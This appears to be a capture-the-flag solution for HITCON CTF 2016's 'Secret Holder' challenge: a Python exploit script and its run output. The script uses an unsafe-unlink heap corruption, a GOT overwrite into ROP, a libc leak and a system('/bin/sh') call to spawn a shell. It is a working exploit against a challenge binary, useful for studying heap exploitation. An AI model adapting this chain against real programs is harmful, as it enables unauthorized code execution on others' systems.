HITCON CTF 2016 Quals Secret Holder (pwn 100) / https://github.com/ctfs/write-ups-2016/tree/master/hitcon-ctf-2016/pwn/secret-holder-100 http://shift-crops.hatenablog.com/entry/2016/10/11/233559

gistfile1.txt

$ python test.py

[+] unsafe unlink attack
[+] GOT overwrite to ROP
[+] leak libc address
[+] execute system('/bin/sh')
[+] got a shell!
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

$ /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al.
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 5.3.1 20160413.
Available extensions:
        crypt add-on version 2.1 by Michael Glad and others
        GNU Libidn by Simon Josefsson
        Native POSIX Threads Library by Ulrich Drepper et al
        BIND-8.2.3-T5B
libc ABIs: UNIQUE IFUNC
For bug reporting instructions, please see:
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.

test.py

from minipwn import *

def keep_secret(s, level, buf):
    recvuntil(s, '3. Renew secret\n')
    sendline(s, '1')
    recvuntil(s, '3. Huge secret\n')
    sendline(s, str(level))
    recvuntil(s, 'Tell me your secret: \n')
    s.sendall(buf or '\x00')

def wipe_secret(s, level):
    recvuntil(s, '3. Renew secret\n')
    sendline(s, '2')
    recvuntil(s, '3. Huge secret\n')
    sendline(s, str(level))

def renew_secret(s, level, buf):
    recvuntil(s, '3. Renew secret\n')
    sendline(s, '3')
    recvuntil(s, '3. Huge secret\n')
    sendline(s, str(level))
    recvuntil(s, 'Tell me your secret: \n')
    s.sendall(buf or '\x00')

s = connect_process(['./SecretHolder_d6c0bed6d695edc12a9e7733bedde182554442f8'])
#s = socket.create_connection(('localhost', 4444))
raw_input()

print "[+] unsafe unlink attack"

keep_secret(s, 3, '')
wipe_secret(s, 3)
keep_secret(s, 1, '')
wipe_secret(s, 1)
keep_secret(s, 3, '')
wipe_secret(s, 1)

addr_ptr_small = 0x6020B0

buf = '\x00' * 0x10
buf += p64(addr_ptr_small-0x18) + p64(addr_ptr_small-0x10)
buf += p64(0x20) + p64(0xfb0)

keep_secret(s, 1, '')
keep_secret(s, 2, '')
renew_secret(s, 3, buf)
wipe_secret(s, 2)

print "[+] GOT overwrite to ROP"

got_memset = 0x602030
got_stack_fail = 0x602028
addr_ret = 0x400691
addr_read_a_lot = 0x4009F9

buf = '\x00' * 8
buf += p64(got_memset)
buf += p64(0)
buf += p64(got_stack_fail)
buf += p32(1) * 3
renew_secret(s, 1, buf)

renew_secret(s, 1, p64(addr_ret))
renew_secret(s, 2, p64(addr_read_a_lot))

print "[+] leak libc address"

addr_pop_rdi = 0x400e03
got_libc_start = 0x602048
addr_plt_puts = 0x4006C0
addr_main = 0x400CC2

buf = '\x00' * 0x18
buf += p64(addr_pop_rdi)
buf += p64(got_libc_start)
buf += p64(addr_plt_puts)
buf += p64(addr_main)

recvuntil(s, '3. Renew secret\n')
s.sendall(buf)

data = s.recv(8192)
addr_libc_start = u64(data.ljust(8, '\x00'))
addr_libc_system = addr_libc_start - 0x20740 + 0x45380
addr_libc_sh = addr_libc_start - 0x20740 + 0x18c58b

print "[+] execute system('/bin/sh')"

buf = '\x00' * 0x18
buf += p64(addr_pop_rdi)
buf += p64(addr_libc_sh)
buf += p64(addr_libc_system)

recvuntil(s, '3. Renew secret\n')
s.sendall(buf)

print "[+] got a shell!"
interact(s)